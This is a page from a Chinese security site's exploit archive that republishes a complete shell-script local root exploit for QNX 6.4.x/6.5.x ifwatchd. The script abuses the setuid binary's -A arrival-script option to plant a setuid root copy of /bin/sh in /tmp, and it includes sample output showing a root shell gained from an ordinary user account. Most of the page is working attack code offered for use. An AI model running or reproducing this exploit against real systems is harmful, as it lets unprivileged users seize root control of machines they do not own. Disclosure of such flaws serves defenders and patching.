首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
QNX 6.4.x/6.5.x ifwatchd - Local root Exploit
来源:vincitamorpatriae@gmail.com 作者:cenobyte 发布时间:2014-03-11  
#!/bin/sh
#
#        QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013
#                         <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# Setuid root ifwatchd watches for addresses added to or deleted from network
# interfaces and calls up/down scripts for them. Any user can launch ifwatchd
# and provide arbitrary up/down scripts. Unfortunately ifwatchd does not drop
# privileges when executing user supplied scripts.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.1
#
# - exploit description:
# This exploit creates a fake arrival-script which will be executed as root by
# passing it to the -A parameter of /sbin/ifwatchd. The fake arrival-script
# copies /bin/sh to /tmp/shell and makes it setuid root. Once the setuid shell
# is in place ifwatchd will be killed to drop the user into the root shell.
#
# - example:
# $ uname -a
# QNX localhost 6.5.0 2010/07/09-14:44:03EDT x86pc x86
# $ id
# uid=100(user) gid=100
# $ ./qnx-ifwatchd.sh
# QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013
#
# [-] creating fake arrival-script
# [-] executing ifwatchd, please wait
# Killed
# [-] now executing suid shell
# # id
# uid=100(user) gid=100 euid=0(root)
   
PATH=/bin:/usr/bin:/sbin
   
if [ ! -x /sbin/ifwatchd ]; then
    echo "error: cannot execute /sbin/ifwatchd"
    exit 1
fi
   
echo "QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013"
echo
echo "[-] creating fake arrival-script"
cat << _EOF_ > /tmp/0
#!/bin/sh
PATH=/bin:/usr/bin
IFWPID=\$(ps -edaf | grep "ifwatchd -A" | awk '!/grep/ { print \$2 }')
cp /bin/sh /tmp/shell
chown root:root /tmp/shell
chmod 4755 /tmp/shell
rm -f /tmp/0
kill -9 \$IFWPID
exit 0
_EOF_
   
chmod +x /tmp/0
   
echo "[-] executing ifwatchd, please wait"
ifwatchd -A /tmp/0 -v lo0 2>&1 >/dev/null
echo "[-] now executing suid shell"
/tmp/shell

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Safari User-Assisted Download
·QNX 6.5.0 x86 io-graphics - Lo
·KMPlayer 3.8.0.117 Buffer Over
·QNX 6.5.0 x86 phfont - Local r
·GetGo Download Manager 4.9.0.1
·QNX 6.4.x/6.5.x pppoectl - Inf
·HP Data Protector Backup Clien
·QNX 6.x phgrafx File Enumerati
·SolidWorks Workgroup PDM 2014
·QNX 6.x phfont Enumeration
·Windows Escalate UAC Protectio
·QNX 6.x Photon Denial Of Servi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved